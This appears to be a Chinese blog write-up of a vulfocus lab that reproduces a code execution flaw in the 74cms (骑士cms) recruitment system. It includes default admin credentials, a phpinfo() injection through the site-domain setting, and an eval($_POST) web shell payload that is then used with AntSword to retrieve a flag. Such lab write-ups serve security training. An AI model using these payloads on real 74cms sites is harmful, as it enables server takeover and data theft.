当前位置:首页 > 文章 > Web安全

骑士cms任意代码执行

admin2周前 (12-30)Web安全34
摘要:一、漏洞背景…
一、漏洞背景
骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。由太原迅易科技有限公司于2009年正式推出。为个人求职和企业招聘提供信息化解决方案, 骑士人才系统具备执行效率高、模板切换自由、后台管理功能灵活、模块功能强大等特点,自上线以来一直是职场人士、企业HR青睐的求职招聘平台。经过7年的发展,骑士人才系统已成国内人才系统行业的排头兵。系统应用涉及政府、企业、科研教育和媒体等行业领域,用户已覆盖国内所有省份和地区。 2016年全新推出骑士人才系统基础版,全新的“平台+插件”体系,打造用户“DIY”个性化功能定制,为众多地方门户、行业人才提供一个专业、稳定、方便的网络招聘管理平台,致力发展成为引领市场风向的优质高效的招聘软件。

二、复现过程
使用vulfocus平台启动漏洞环境

进入网站

点击任意页面,发现url地址为:

http://123.58.224.8:11001/index.php?m=&c=jobs&a=jobs_list



在url地址后面加上/index.php?m=Admin,尝试访问后台发现成功

根据靶场基本信息得知后台管理的用户名密码都是adminadmin

成功登录后我们点击系统然后选择网站配置,在网站域名处输入

http://127.0.0.1/.',phpinfo(),'/.com



点击保存然后刷新界面重新登录,显示phpinof页面,发现网站域名一栏里存在代码执行漏洞,表单中包含php许可证、团队、网站请求包、配置等大量信息

发现漏洞存在后对代码注入点进行getshell,这里我们需要重启实验环境,然后继续通过url地址栏访问管理员登录界面,然后我们回到上次发现代码执行漏洞的代码注入点,输入

http://127.0.0.1/.',eval($_POST[a]),'/.com



用蚁剑进行连接

在网站根目录下的tmp文件夹中找到了flag

提交flag完成复现

扫描二维码推送至手机访问。

版权声明:本文由日常随记发布,如需转载请注明出处。

本文链接:https://www.7x0.cn/post/10.html

“骑士cms任意代码执行” 的相关文章